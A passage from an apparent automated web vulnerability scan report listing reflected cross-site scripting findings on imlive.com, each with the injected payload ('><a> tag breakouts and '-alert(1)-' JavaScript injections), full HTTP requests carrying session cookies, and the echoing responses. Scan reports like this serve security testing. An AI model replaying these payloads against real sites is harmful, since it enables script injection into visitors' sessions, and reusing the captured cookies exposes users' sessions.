This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /minglesingles.asp?1a452'><a>a6955adbf25=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:10 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:10 GMT
Connection: close
Content-Length: 16143
Vary: Accept-Encoding


<html>
   <head>
       <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title>
       <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/minglesingles.asp?1a452'><a>a6955adbf25=1&lr=1107816009&ud=0&pe=minglesingles.asp&qs=1a452'>
...[SNIP]...

2.126. http://imlive.com/pr.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /pr.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90148'><a>2e9c3e6d159 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /pr.asp?90148'><a>2e9c3e6d159=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:18 GMT
Connection: close
Content-Length: 9886
Vary: Accept-Encoding


<!--include file="help/CustomerServiceEmails.inc"-->

<html>
   <head>
       <title>Public Relations of ImLive Video Chat</title>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/pr.asp?90148'><a>2e9c3e6d159=1&lr=1107816009&ud=0&pe=pr.asp&qs=90148'>
...[SNIP]...

2.127. http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /preparesearch.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad584"><a>5bd7ab7e3b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. In the response below it lands inside the double-quoted onclick attribute of the English-language link (class="en"), within the argument to dAccess(...); the double quote in the payload terminates the attribute, which is what lets the ><a> that follows start a new tag.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input: the request to /preparesearch.asp was redirected to /preparesearch.aspx, and the reflection appears in that second response (the echoed URL below reads preparesearch.aspx). It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /preparesearch.asp?ad584"><a>5bd7ab7e3b0=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:33 GMT
Connection: close
Content-Length: 19415
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/preparesearch.aspx?ad584"><a>5bd7ab7e3b0=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.128. http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /preparesearch.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cf17'-alert(1)-'f7758fd0154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input: the request to /preparesearch.asp was redirected to /preparesearch.aspx, and the reflection appears in that second response (the echoed URL below reads preparesearch.aspx). It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /preparesearch.asp?1cf17'-alert(1)-'f7758fd0154=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:57 GMT
Connection: close
Content-Length: 19576
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx?1cf17'-alert(1)-'f7758fd0154=1&qs=1cf17'-alert(1)-'f7758fd0154=1&qs=1cf17'-alert(1)-'f7758fd0154=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

2.129. http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /preparesearch.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aed33"><a>4a10453e31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. In the response below it lands inside the double-quoted onclick attribute of the English-language link (class="en"), within the argument to dAccess(...); the double quote in the payload terminates the attribute, which is what lets the ><a> that follows start a new tag.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /preparesearch.aspx?aed33"><a>4a10453e31b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:56 GMT
Connection: close
Content-Length: 19417
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/preparesearch.aspx?aed33"><a>4a10453e31b=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.130. http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /preparesearch.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ac9b'-alert(1)-'0d66f31204c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /preparesearch.aspx?8ac9b'-alert(1)-'0d66f31204c=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:00 GMT
Connection: close
Content-Length: 19578
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx?8ac9b'-alert(1)-'0d66f31204c=1&qs=8ac9b'-alert(1)-'0d66f31204c=1&qs=8ac9b'-alert(1)-'0d66f31204c=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function
...[SNIP]...

2.131. http://imlive.com/sitemap.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1979b'><a>18155b4088b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitemap.html?1979b'><a>18155b4088b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:32 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:32 GMT
Connection: close
Content-Length: 33756
Vary: Accept-Encoding


<html>
<head>
<meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/sitemap.html?1979b'><a>18155b4088b=1&lr=1107816008&ud=0&pe=sitemap.asp&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.132. http://imlive.com/videosfr.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /videosfr.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f44ce'><a>23f9fd95641 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videosfr.asp?f44ce'><a>23f9fd95641=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:13 GMT
Connection: close
Content-Length: 15757
Vary: Accept-Encoding


<html>
   <head>
       <title>Video Chat Recorded on Webcam at ImLive</title>
       <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/videosfr.asp?f44ce'><a>23f9fd95641=1&lr=1107816009&ud=0&pe=videosfr.asp&qs=f44ce'>
...[SNIP]...

2.133. http://imlive.com/warningjx.aspx [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /warningjx.aspx

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2a49'-alert(1)-'2edefc94fdc was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /warningjx.aspx?redirect=/e2a49'-alert(1)-'2edefc94fdc HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:33 GMT
Connection: close
Content-Length: 2375
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   War
...[SNIP]...
<script type="text/javascript">
function IAgree(){document.location.href='?meAgree=yes&redirect=%2fe2a49'-alert(1)-'2edefc94fdc'; return false;}
function IDontAgree() { window.parent.location.href = "/"; return false; }
</script>
...[SNIP]...

2.134. http://imlive.com/warningms.asp [ms parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /warningms.asp

Issue detail

